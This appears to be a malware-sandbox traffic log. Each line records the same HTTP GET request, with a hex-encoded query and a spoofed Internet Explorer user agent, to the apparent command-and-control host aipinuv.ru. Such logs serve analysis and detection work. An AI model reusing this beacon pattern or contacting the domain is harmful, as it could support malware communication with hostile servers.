Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1Host: aipinuv.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
